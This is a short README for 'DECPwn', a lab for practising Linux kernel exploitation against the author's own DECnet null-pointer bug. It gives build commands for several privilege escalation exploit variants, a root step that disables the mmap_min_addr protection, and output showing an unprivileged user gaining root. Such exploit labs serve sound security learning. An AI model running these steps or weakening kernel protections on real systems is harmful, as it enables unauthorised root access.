Home

Awesome

DECPwn

Practicing different Linux kernel exploitation techniques with my DECnet vulnerability and null page mapping enabled.


Scenarios

Build

apt install libdnet
gcc -o lpe lpe.c -ldnet
gcc -o lpe-core_pattern lpe-core_pattern.c -ldnet
gcc -o lpe-nosmep lpe-nosmep.c -ldnet -no-pie
gcc -o lpe-syscall lpe-syscall.c -ldnet -no-pie

Run

Configure DECnet as root:

sysctl -w vm.mmap_min_addr="0" # 0x1000
echo -n "1.10" > /proc/sys/net/decnet/node_address

Run the exploit as unprivileged user:

$ ./lpe
[*] Saved state
[*] Triggering NPD
[*] Returned to userland
[*] UID: 0, got root!
#